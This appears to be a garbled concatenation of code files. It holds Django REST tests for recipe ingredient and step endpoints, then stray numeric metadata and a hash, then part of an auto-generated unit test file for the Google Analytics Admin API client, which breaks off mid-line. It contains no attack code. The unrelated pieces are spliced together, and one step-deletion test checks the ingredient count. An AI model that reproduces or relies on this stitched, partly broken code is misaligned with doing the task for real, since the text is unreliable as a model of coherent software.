self.assertContains(response, self.recipe_name) class IngredientListViewTests(ViewTests): """ Test the ingredient-list view. """ def setUp(self): super(IngredientListViewTests, self).setUp() recipe = Recipe.objects.get(name=self.recipe_name) self.create_read_url = reverse("ingredient-list", kwargs={"pk": recipe.id}) self.text = "Great ingredient" self.post = json.dumps({ "template": {"data": [{"name": "text", "value": self.text}]}}) # add ingredient :-) Ingredient.objects.get_or_create(recipe=recipe, text=self.text) def test_ingredient_create_success(self): self.client.login(username=self.username, password=self.password) response = self.client.post(self.create_read_url, data=self.post, content_type=self.content_type) self.assertEqual(response.status_code, status.HTTP_201_CREATED) def test_ingredient_create_failure_unauthenticated(self): response = self.client.post(self.create_read_url, data=self.post, content_type=self.content_type) self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED) def test_ingredient_create_failure_access_denied(self): self.client.login(username='another', password='another-pass') response = self.client.post(self.create_read_url, data=self.post, content_type=self.content_type) self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN) def test_ingredient_list_success_authenticated(self): self.client.login(username=self.username, password=self.password) response = self.client.get(self.create_read_url) self.assertContains(response, self.text) def test_ingredient_list_success_unauthenticated(self): response = self.client.get(self.create_read_url) self.assertContains(response, self.text) class IngredientDetailViewTests(ViewTests): """ Test the ingredient-detail view. """ def setUp(self): super(IngredientDetailViewTests, self).setUp() # add ingredient :-) recipe = Recipe.objects.get(name=self.recipe_name) self.text = "Great ingredient" (ingredient, tf) = Ingredient.objects.get_or_create(recipe=recipe, text=self.text) self.read_update_delete_url = reverse("ingredient-detail", kwargs={"pk": ingredient.id}) self.update_text = "Another great ingredient" self.put = json.dumps({ "template": {"data": [{"name": "text", "value": self.update_text}]}}) def test_ingredient_detail_success_authenticated(self): self.client.login(username=self.username, password=self.password) response = self.client.get(self.read_update_delete_url) self.assertContains(response, self.text) def test_ingredient_detail_success_unauthenticated(self): response = self.client.get(self.read_update_delete_url) self.assertContains(response, self.text) def test_ingredient_update_success(self): self.client.login(username=self.username, password=self.password) response = self.client.put(self.read_update_delete_url, data=self.put, content_type=self.content_type) self.assertContains(response, self.update_text) def test_ingredient_update_failure_unauthenticated(self): response = self.client.put(self.read_update_delete_url, data=self.put, content_type=self.content_type) self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED) def test_ingredient_update_failure_access_denied(self): self.client.login(username='another', password='another-pass') response = self.client.put(self.read_update_delete_url, data=self.put, content_type=self.content_type) self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN) def test_ingredient_delete_success(self): self.client.login(username=self.username, password=self.password) response = self.client.delete(self.read_update_delete_url) self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT) self.assertEqual(Ingredient.objects.count(), 0) def test_ingredient_delete_failure_unauthenticated(self): response = self.client.delete(self.read_update_delete_url) self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED) def test_ingredient_delete_failure_access_denied(self): self.client.login(username='another', password='another-pass') response = self.client.delete(self.read_update_delete_url) self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN) class StepListViewTests(ViewTests): """ Test the step-list view. """ def setUp(self): super(StepListViewTests, self).setUp() recipe = Recipe.objects.get(name=self.recipe_name) self.create_read_url = reverse("step-list", kwargs={"pk": recipe.id}) self.text = "Great step" self.post = json.dumps({ "template": {"data": [{"name": "step_text", "value": self.text}]}}) # add step Step.objects.get_or_create(recipe=recipe, step_text=self.text) def test_step_create_success(self): self.client.login(username=self.username, password=self.password) response = self.client.post(self.create_read_url, data=self.post, content_type=self.content_type) self.assertEqual(response.status_code, status.HTTP_201_CREATED) def test_step_create_failure_unauthenticated(self): response = self.client.post(self.create_read_url, data=self.post, content_type=self.content_type) self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED) def test_step_create_failure_access_denied(self): self.client.login(username='another', password='another-pass') response = self.client.post(self.create_read_url, data=self.post, content_type=self.content_type) self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN) def test_step_list_success_authenticated(self): self.client.login(username=self.username, password=self.password) response = self.client.get(self.create_read_url) self.assertContains(response, self.text) def test_step_list_success_unauthenticated(self): response = self.client.get(self.create_read_url) self.assertContains(response, self.text) class StepDetailViewTests(ViewTests): """ Test the step-detail view. """ def setUp(self): super(StepDetailViewTests, self).setUp() # add step recipe = Recipe.objects.get(name=self.recipe_name) self.text = "Great step" (step, tf) = Step.objects.get_or_create(recipe=recipe, step_text=self.text) self.read_update_delete_url = reverse("step-detail", kwargs={"pk": step.id}) self.update_text = "Another great step" self.put = json.dumps({ "template": {"data": [{"name": "step_text", "value": self.update_text}]}}) def test_step_detail_success_authenticated(self): self.client.login(username=self.username, password=self.password) response = self.client.get(self.read_update_delete_url) self.assertContains(response, self.text) def test_step_detail_success_unauthenticated(self): response = self.client.get(self.read_update_delete_url) self.assertContains(response, self.text) def test_step_update_success(self): self.client.login(username=self.username, password=self.password) response = self.client.put(self.read_update_delete_url, data=self.put, content_type=self.content_type) self.assertContains(response, self.update_text) def test_step_update_failure_unauthenticated(self): response = self.client.put(self.read_update_delete_url, data=self.put, content_type=self.content_type) self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED) def test_step_update_failure_access_denied(self): self.client.login(username='another', password='another-pass') response = self.client.put(self.read_update_delete_url, data=self.put, content_type=self.content_type) self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN) def test_step_delete_success(self): self.client.login(username=self.username, password=self.password) response = self.client.delete(self.read_update_delete_url) self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT) self.assertEqual(Ingredient.objects.count(), 0) def test_step_delete_failure_unauthenticated(self): response = self.client.delete(self.read_update_delete_url) self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED) def test_step_delete_failure_access_denied(self): self.client.login(username='another', password='another-pass') response = self.client.delete(self.read_update_delete_url) self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
43.005618
96
0.68661
1,796
15,310
5.614699
0.058463
0.063467
0.0714
0.05355
0.863348
0.84044
0.807517
0.797402
0.780742
0.765073
0
0.006042
0.210843
15,310
355
97
43.126761
0.828588
0.022142
0
0.608163
0
0
0.046847
0.003702
0
0
0
0
0.183673
1
0.195918
false
0.110204
0.036735
0
0.265306
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
7
c739fa56cafe5c3ba23300537dde93b0a590781b
863,917
py
Python
tests/unit/gapic/admin_v1alpha/test_analytics_admin_service.py
renovate-bot/python-analytics-admin
c3310773def7a76fee4c061ff0881cd176507626
[ "Apache-2.0" ]
null
null
null
tests/unit/gapic/admin_v1alpha/test_analytics_admin_service.py
renovate-bot/python-analytics-admin
c3310773def7a76fee4c061ff0881cd176507626
[ "Apache-2.0" ]
null
null
null
tests/unit/gapic/admin_v1alpha/test_analytics_admin_service.py
renovate-bot/python-analytics-admin
c3310773def7a76fee4c061ff0881cd176507626
[ "Apache-2.0" ]
null
null
null
# -*- coding: utf-8 -*- # Copyright 2020 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import os import mock import packaging.version import grpc from grpc.experimental import aio import math import pytest from proto.marshal.rules.dates import DurationRule, TimestampRule from google.analytics.admin_v1alpha.services.analytics_admin_service import ( AnalyticsAdminServiceAsyncClient, ) from google.analytics.admin_v1alpha.services.analytics_admin_service import ( AnalyticsAdminServiceClient, ) from google.analytics.admin_v1alpha.services.analytics_admin_service import pagers from google.analytics.admin_v1alpha.services.analytics_admin_service import transports from google.analytics.admin_v1alpha.services.analytics_admin_service.transports.base import ( _GOOGLE_AUTH_VERSION, ) from google.analytics.admin_v1alpha.types import analytics_admin from google.analytics.admin_v1alpha.types import resources from google.api_core import client_options from google.api_core import exceptions as core_exceptions from google.api_core import gapic_v1 from google.api_core import grpc_helpers from google.api_core import grpc_helpers_async from google.api_core import path_template from google.auth import credentials as ga_credentials from google.auth.exceptions import MutualTLSChannelError from google.oauth2 import service_account from google.protobuf import field_mask_pb2 # type: ignore from google.protobuf import timestamp_pb2 # type: ignore from google.protobuf import wrappers_pb2 # type: ignore import google.auth # TODO(busunkim): Once google-auth >= 1.25.0 is required transitively # through google-api-core: # - Delete the auth "less than" test cases # - Delete these pytest markers (Make the "greater than or equal to" tests the default). requires_google_auth_lt_1_25_0 = pytest.mark.skipif( packaging.version.parse(_GOOGLE_AUTH_VERSION) >= packaging.version.parse("1.25.0"), reason="This test requires google-auth < 1.25.0", ) requires_google_auth_gte_1_25_0 = pytest.mark.skipif( packaging.version.parse(_GOOGLE_AUTH_VERSION) < packaging.version.parse("1.25.0"), reason="This test requires google-auth >= 1.25.0", ) def client_cert_source_callback(): return b"cert bytes", b"key bytes" # If default endpoint is localhost, then default mtls endpoint will be the same. # This method modifies the default endpoint so the client can produce a different # mtls endpoint for endpoint testing purposes. def modify_default_endpoint(client): return ( "foo.googleapis.com" if ("localhost" in client.DEFAULT_ENDPOINT) else client.DEFAULT_ENDPOINT ) def test__get_default_mtls_endpoint(): api_endpoint = "example.googleapis.com" api_mtls_endpoint = "example.mtls.googleapis.com" sandbox_endpoint = "example.sandbox.googleapis.com" sandbox_mtls_endpoint = "example.mtls.sandbox.googleapis.com" non_googleapi = "api.example.com" assert AnalyticsAdminServiceClient._get_default_mtls_endpoint(None) is None assert ( AnalyticsAdminServiceClient._get_default_mtls_endpoint(api_endpoint) == api_mtls_endpoint ) assert ( AnalyticsAdminServiceClient._get_default_mtls_endpoint(api_mtls_endpoint) == api_mtls_endpoint ) assert ( AnalyticsAdminServiceClient._get_default_mtls_endpoint(sandbox_endpoint) == sandbox_mtls_endpoint ) assert ( AnalyticsAdminServiceClient._get_default_mtls_endpoint(sandbox_mtls_endpoint) == sandbox_mtls_endpoint ) assert ( AnalyticsAdminServiceClient._get_default_mtls_endpoint(non_googleapi) == non_googleapi ) @pytest.mark.parametrize( "client_class", [AnalyticsAdminServiceClient, AnalyticsAdminServiceAsyncClient,] ) def test_analytics_admin_service_client_from_service_account_info(client_class): creds = ga_credentials.AnonymousCredentials() with mock.patch.object( service_account.Credentials, "from_service_account_info" ) as factory: factory.return_value = creds info = {"valid": True} client = client_class.from_service_account_info(info) assert client.transport._credentials == creds assert isinstance(client, client_class) assert client.transport._host == "analyticsadmin.googleapis.com:443" @pytest.mark.parametrize( "transport_class,transport_name", [ (transports.AnalyticsAdminServiceGrpcTransport, "grpc"), (transports.AnalyticsAdminServiceGrpcAsyncIOTransport, "grpc_asyncio"), ], ) def test_analytics_admin_service_client_service_account_always_use_jwt( transport_class, transport_name ): with mock.patch.object( service_account.Credentials, "with_always_use_jwt_access", create=True ) as use_jwt: creds = service_account.Credentials(None, None, None) transport = transport_class(credentials=creds, always_use_jwt_access=True) use_jwt.assert_called_once_with(True) with mock.patch.object( service_account.Credentials, "with_always_use_jwt_access", create=True ) as use_jwt: creds = service_account.Credentials(None, None, None) transport = transport_class(credentials=creds, always_use_jwt_access=False) use_jwt.assert_not_called() @pytest.mark.parametrize( "client_class", [AnalyticsAdminServiceClient, AnalyticsAdminServiceAsyncClient,] ) def test_analytics_admin_service_client_from_service_account_file(client_class): creds = ga_credentials.AnonymousCredentials() with mock.patch.object( service_account.Credentials, "from_service_account_file" ) as factory: factory.return_value = creds client = client_class.from_service_account_file("dummy/file/path.json") assert client.transport._credentials == creds assert isinstance(client, client_class) client = client_class.from_service_account_json("dummy/file/path.json") assert client.transport._credentials == creds assert isinstance(client, client_class) assert client.transport._host == "analyticsadmin.googleapis.com:443" def test_analytics_admin_service_client_get_transport_class(): transport = AnalyticsAdminServiceClient.get_transport_class() available_transports = [ transports.AnalyticsAdminServiceGrpcTransport, ] assert transport in available_transports transport = AnalyticsAdminServiceClient.get_transport_class("grpc") assert transport == transports.AnalyticsAdminServiceGrpcTransport @pytest.mark.parametrize( "client_class,transport_class,transport_name", [ ( AnalyticsAdminServiceClient, transports.AnalyticsAdminServiceGrpcTransport, "grpc", ), ( AnalyticsAdminServiceAsyncClient, transports.AnalyticsAdminServiceGrpcAsyncIOTransport, "grpc_asyncio", ), ], ) @mock.patch.object( AnalyticsAdminServiceClient, "DEFAULT_ENDPOINT", modify_default_endpoint(AnalyticsAdminServiceClient), ) @mock.patch.object( AnalyticsAdminServiceAsyncClient, "DEFAULT_ENDPOINT", modify_default_endpoint(AnalyticsAdminServiceAsyncClient), ) def test_analytics_admin_service_client_client_options( client_class, transport_class, transport_name ): # Check that if channel is provided we won't create a new one. with mock.patch.object(AnalyticsAdminServiceClient, "get_transport_class") as gtc: transport = transport_class(credentials=ga_credentials.AnonymousCredentials()) client = client_class(transport=transport) gtc.assert_not_called() # Check that if channel is provided via str we will create a new one. with mock.patch.object(AnalyticsAdminServiceClient, "get_transport_class") as gtc: client = client_class(transport=transport_name) gtc.assert_called() # Check the case api_endpoint is provided. options = client_options.ClientOptions(api_endpoint="squid.clam.whelk") with mock.patch.object(transport_class, "__init__") as patched: patched.return_value = None client = client_class(client_options=options) patched.assert_called_once_with( credentials=None, credentials_file=None, host="squid.clam.whelk", scopes=None, client_cert_source_for_mtls=None, quota_project_id=None, client_info=transports.base.DEFAULT_CLIENT_INFO, always_use_jwt_access=True, ) # Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT is # "never". with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "never"}): with mock.patch.object(transport_class, "__init__") as patched: patched.return_value = None client = client_class() patched.assert_called_once_with( credentials=None, credentials_file=None, host=client.DEFAULT_ENDPOINT, scopes=None, client_cert_source_for_mtls=None, quota_project_id=None, client_info=transports.base.DEFAULT_CLIENT_INFO, always_use_jwt_access=True, ) # Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT is # "always". with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "always"}): with mock.patch.object(transport_class, "__init__") as patched: patched.return_value = None client = client_class() patched.assert_called_once_with( credentials=None, credentials_file=None, host=client.DEFAULT_MTLS_ENDPOINT, scopes=None, client_cert_source_for_mtls=None, quota_project_id=None, client_info=transports.base.DEFAULT_CLIENT_INFO, always_use_jwt_access=True, ) # Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT has # unsupported value. with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "Unsupported"}): with pytest.raises(MutualTLSChannelError): client = client_class() # Check the case GOOGLE_API_USE_CLIENT_CERTIFICATE has unsupported value. with mock.patch.dict( os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "Unsupported"} ): with pytest.raises(ValueError): client = client_class() # Check the case quota_project_id is provided options = client_options.ClientOptions(quota_project_id="octopus") with mock.patch.object(transport_class, "__init__") as patched: patched.return_value = None client = client_class(client_options=options) patched.assert_called_once_with( credentials=None, credentials_file=None, host=client.DEFAULT_ENDPOINT, scopes=None, client_cert_source_for_mtls=None, quota_project_id="octopus", client_info=transports.base.DEFAULT_CLIENT_INFO, always_use_jwt_access=True, ) @pytest.mark.parametrize( "client_class,transport_class,transport_name,use_client_cert_env", [ ( AnalyticsAdminServiceClient, transports.AnalyticsAdminServiceGrpcTransport, "grpc", "true", ), ( AnalyticsAdminServiceAsyncClient, transports.AnalyticsAdminServiceGrpcAsyncIOTransport, "grpc_asyncio", "true", ), ( AnalyticsAdminServiceClient, transports.AnalyticsAdminServiceGrpcTransport, "grpc", "false", ), ( AnalyticsAdminServiceAsyncClient, transports.AnalyticsAdminServiceGrpcAsyncIOTransport, "grpc_asyncio", "false", ), ], ) @mock.patch.object( AnalyticsAdminServiceClient, "DEFAULT_ENDPOINT", modify_default_endpoint(AnalyticsAdminServiceClient), ) @mock.patch.object( AnalyticsAdminServiceAsyncClient, "DEFAULT_ENDPOINT", modify_default_endpoint(AnalyticsAdminServiceAsyncClient), ) @mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "auto"}) def test_analytics_admin_service_client_mtls_env_auto( client_class, transport_class, transport_name, use_client_cert_env ): # This tests the endpoint autoswitch behavior. Endpoint is autoswitched to the default # mtls endpoint, if GOOGLE_API_USE_CLIENT_CERTIFICATE is "true" and client cert exists. # Check the case client_cert_source is provided. Whether client cert is used depends on # GOOGLE_API_USE_CLIENT_CERTIFICATE value. with mock.patch.dict( os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env} ): options = client_options.ClientOptions( client_cert_source=client_cert_source_callback ) with mock.patch.object(transport_class, "__init__") as patched: patched.return_value = None client = client_class(client_options=options) if use_client_cert_env == "false": expected_client_cert_source = None expected_host = client.DEFAULT_ENDPOINT else: expected_client_cert_source = client_cert_source_callback expected_host = client.DEFAULT_MTLS_ENDPOINT patched.assert_called_once_with( credentials=None, credentials_file=None, host=expected_host, scopes=None, client_cert_source_for_mtls=expected_client_cert_source, quota_project_id=None, client_info=transports.base.DEFAULT_CLIENT_INFO, always_use_jwt_access=True, ) # Check the case ADC client cert is provided. Whether client cert is used depends on # GOOGLE_API_USE_CLIENT_CERTIFICATE value. with mock.patch.dict( os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env} ): with mock.patch.object(transport_class, "__init__") as patched: with mock.patch( "google.auth.transport.mtls.has_default_client_cert_source", return_value=True, ): with mock.patch( "google.auth.transport.mtls.default_client_cert_source", return_value=client_cert_source_callback, ): if use_client_cert_env == "false": expected_host = client.DEFAULT_ENDPOINT expected_client_cert_source = None else: expected_host = client.DEFAULT_MTLS_ENDPOINT expected_client_cert_source = client_cert_source_callback patched.return_value = None client = client_class() patched.assert_called_once_with( credentials=None, credentials_file=None, host=expected_host, scopes=None, client_cert_source_for_mtls=expected_client_cert_source, quota_project_id=None, client_info=transports.base.DEFAULT_CLIENT_INFO, always_use_jwt_access=True, ) # Check the case client_cert_source and ADC client cert are not provided. with mock.patch.dict( os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env} ): with mock.patch.object(transport_class, "__init__") as patched: with mock.patch( "google.auth.transport.mtls.has_default_client_cert_source", return_value=False, ): patched.return_value = None client = client_class() patched.assert_called_once_with( credentials=None, credentials_file=None, host=client.DEFAULT_ENDPOINT, scopes=None, client_cert_source_for_mtls=None, quota_project_id=None, client_info=transports.base.DEFAULT_CLIENT_INFO, always_use_jwt_access=True, ) @pytest.mark.parametrize( "client_class,transport_class,transport_name", [ ( AnalyticsAdminServiceClient, transports.AnalyticsAdminServiceGrpcTransport, "grpc", ), ( AnalyticsAdminServiceAsyncClient, transports.AnalyticsAdminServiceGrpcAsyncIOTransport, "grpc_asyncio", ), ], ) def test_analytics_admin_service_client_client_options_scopes( client_class, transport_class, transport_name ): # Check the case scopes are provided. options = client_options.ClientOptions(scopes=["1", "2"],) with mock.patch.object(transport_class, "__init__") as patched: patched.return_value = None client = client_class(client_options=options) patched.assert_called_once_with( credentials=None, credentials_file=None, host=client.DEFAULT_ENDPOINT, scopes=["1", "2"], client_cert_source_for_mtls=None, quota_project_id=None, client_info=transports.base.DEFAULT_CLIENT_INFO, always_use_jwt_access=True, ) @pytest.mark.parametrize( "client_class,transport_class,transport_name", [ ( AnalyticsAdminServiceClient, transports.AnalyticsAdminServiceGrpcTransport, "grpc", ), ( AnalyticsAdminServiceAsyncClient, transports.AnalyticsAdminServiceGrpcAsyncIOTransport, "grpc_asyncio", ), ], ) def test_analytics_admin_service_client_client_options_credentials_file( client_class, transport_class, transport_name ): # Check the case credentials file is provided. options = client_options.ClientOptions(credentials_file="credentials.json") with mock.patch.object(transport_class, "__init__") as patched: patched.return_value = None client = client_class(client_options=options) patched.assert_called_once_with( credentials=None, credentials_file="credentials.json", host=client.DEFAULT_ENDPOINT, scopes=None, client_cert_source_for_mtls=None, quota_project_id=None, client_info=transports.base.DEFAULT_CLIENT_INFO, always_use_jwt_access=True, ) def test_analytics_admin_service_client_client_options_from_dict(): with mock.patch( "google.analytics.admin_v1alpha.services.analytics_admin_service.transports.AnalyticsAdminServiceGrpcTransport.__init__" ) as grpc_transport: grpc_transport.return_value = None client = AnalyticsAdminServiceClient( client_options={"api_endpoint": "squid.clam.whelk"} ) grpc_transport.assert_called_once_with( credentials=None, credentials_file=None, host="squid.clam.whelk", scopes=None, client_cert_source_for_mtls=None, quota_project_id=None, client_info=transports.base.DEFAULT_CLIENT_INFO, always_use_jwt_access=True, ) def test_get_account( transport: str = "grpc", request_type=analytics_admin.GetAccountRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.get_account), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = resources.Account( name="name_value", display_name="display_name_value", region_code="region_code_value", deleted=True, ) response = client.get_account(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetAccountRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.Account) assert response.name == "name_value" assert response.display_name == "display_name_value" assert response.region_code == "region_code_value" assert response.deleted is True def test_get_account_from_dict(): test_get_account(request_type=dict) def test_get_account_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.get_account), "__call__") as call: client.get_account() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetAccountRequest() @pytest.mark.asyncio async def test_get_account_async( transport: str = "grpc_asyncio", request_type=analytics_admin.GetAccountRequest ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.get_account), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.Account( name="name_value", display_name="display_name_value", region_code="region_code_value", deleted=True, ) ) response = await client.get_account(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetAccountRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.Account) assert response.name == "name_value" assert response.display_name == "display_name_value" assert response.region_code == "region_code_value" assert response.deleted is True @pytest.mark.asyncio async def test_get_account_async_from_dict(): await test_get_account_async(request_type=dict) def test_get_account_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.GetAccountRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.get_account), "__call__") as call: call.return_value = resources.Account() client.get_account(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] @pytest.mark.asyncio async def test_get_account_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.GetAccountRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.get_account), "__call__") as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(resources.Account()) await client.get_account(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] def test_get_account_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.get_account), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = resources.Account() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.get_account(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" def test_get_account_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.get_account( analytics_admin.GetAccountRequest(), name="name_value", ) @pytest.mark.asyncio async def test_get_account_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.get_account), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = resources.Account() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(resources.Account()) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.get_account(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" @pytest.mark.asyncio async def test_get_account_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.get_account( analytics_admin.GetAccountRequest(), name="name_value", ) def test_list_accounts( transport: str = "grpc", request_type=analytics_admin.ListAccountsRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.list_accounts), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = analytics_admin.ListAccountsResponse( next_page_token="next_page_token_value", ) response = client.list_accounts(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ListAccountsRequest() # Establish that the response is the type that we expect. assert isinstance(response, pagers.ListAccountsPager) assert response.next_page_token == "next_page_token_value" def test_list_accounts_from_dict(): test_list_accounts(request_type=dict) def test_list_accounts_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.list_accounts), "__call__") as call: client.list_accounts() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ListAccountsRequest() @pytest.mark.asyncio async def test_list_accounts_async( transport: str = "grpc_asyncio", request_type=analytics_admin.ListAccountsRequest ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.list_accounts), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.ListAccountsResponse( next_page_token="next_page_token_value", ) ) response = await client.list_accounts(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ListAccountsRequest() # Establish that the response is the type that we expect. assert isinstance(response, pagers.ListAccountsAsyncPager) assert response.next_page_token == "next_page_token_value" @pytest.mark.asyncio async def test_list_accounts_async_from_dict(): await test_list_accounts_async(request_type=dict) def test_list_accounts_pager(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.list_accounts), "__call__") as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListAccountsResponse( accounts=[ resources.Account(), resources.Account(), resources.Account(), ], next_page_token="abc", ), analytics_admin.ListAccountsResponse(accounts=[], next_page_token="def",), analytics_admin.ListAccountsResponse( accounts=[resources.Account(),], next_page_token="ghi", ), analytics_admin.ListAccountsResponse( accounts=[resources.Account(), resources.Account(),], ), RuntimeError, ) metadata = () pager = client.list_accounts(request={}) assert pager._metadata == metadata results = [i for i in pager] assert len(results) == 6 assert all(isinstance(i, resources.Account) for i in results) def test_list_accounts_pages(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.list_accounts), "__call__") as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListAccountsResponse( accounts=[ resources.Account(), resources.Account(), resources.Account(), ], next_page_token="abc", ), analytics_admin.ListAccountsResponse(accounts=[], next_page_token="def",), analytics_admin.ListAccountsResponse( accounts=[resources.Account(),], next_page_token="ghi", ), analytics_admin.ListAccountsResponse( accounts=[resources.Account(), resources.Account(),], ), RuntimeError, ) pages = list(client.list_accounts(request={}).pages) for page_, token in zip(pages, ["abc", "def", "ghi", ""]): assert page_.raw_page.next_page_token == token @pytest.mark.asyncio async def test_list_accounts_async_pager(): client = 